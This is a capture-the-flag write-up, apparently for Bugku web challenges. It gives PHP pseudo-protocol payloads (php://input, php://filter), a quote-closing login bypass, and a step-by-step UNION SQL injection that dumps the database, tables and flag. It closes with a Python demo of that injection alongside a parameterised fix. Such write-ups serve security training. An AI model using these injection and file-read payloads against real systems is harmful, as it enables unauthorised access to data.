web1:
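Reading the code in the image shows that c is the content read from b, and that the flag is returned when a and b are equal.
Use the PHP pseudo-protocol and POST 1.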
http://123.206.31.85:10001/?a=1&b=php://input
web2:
A simple arithmetic expression: match it with a regular expression and compute the result.
The code is as follows:
web3:
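Use Burp to change the file type and bypass the check, which leads to a page.
Apply a PHP pseudo-protocol to the op parameter to get the flag.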
http://123.206.31.85:10003/?op=php://filter/read=convert.base64-encode/resource=flag&imagekey=72de19c132dbbb873ec4a9c5b9cd0d974d8ed16d
web4:
Use a universal password directly; closing the single quote is enough.
web5:
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 returns empty
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 or 1=1 # returns normally
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 union select 1,2 # empty response
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 union select 1,2,3 # empty response
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 union select 1,2,3,4 # normal response
This reveals the echo position and a column count of 4, so start dumping the database name.
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,2,database(),4#
Dump the tables:
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27web5%27
Dump the columns:
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,%20group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27flag%27#
Get the flag:
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,flag,3,4%20from%20flag#
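Why the web5 requests behave as they do, and the fix, as an added example (not the challenge's code): the id value is concatenated into the query, so a UNION with the wrong column count errors out (shown as an empty page) and one with 4 columns is echoed; binding id as a parameter removes the issue. SQLite, the article table and the sample flag value are assumptions constructed for this sketch; the original runs on PHP with MySQL.

```python
import sqlite3

COLS = "id, title, body, author"  # four columns, matching the count found above

def make_db():
    """Constructed stand-in for the challenge database (names are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE article (id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO article VALUES (1, 'hello', 'first post', 'admin');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('flag{constructed_sample}');
    """)
    return db

def read_vulnerable(db, raw_id):
    # The id parameter is pasted into the SQL text, so it can extend the statement.
    return db.execute(f"SELECT {COLS} FROM article WHERE id = " + raw_id).fetchall()

def read_hardened(db, raw_id):
    # Reject anything that is not a plain decimal id, then bind it as data.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []
    return db.execute(f"SELECT {COLS} FROM article WHERE id = ?",
                      (int(raw_id),)).fetchall()

def outcome(reader, db, raw_id):
    # A page that hides SQL errors shows them to the visitor as an empty response.
    try:
        return reader(db, raw_id)
    except sqlite3.Error:
        return "sql error"

if __name__ == "__main__":
    db = make_db()
    for raw_id in ["1", "0 union select 1,2", "0 union select 1,2,3,4",
                   "0 union select 1,flag,3,4 from flag"]:
        print(repr(raw_id), "| vulnerable:", outcome(read_vulnerable, db, raw_id),
              "| hardened:", outcome(read_hardened, db, raw_id))
```
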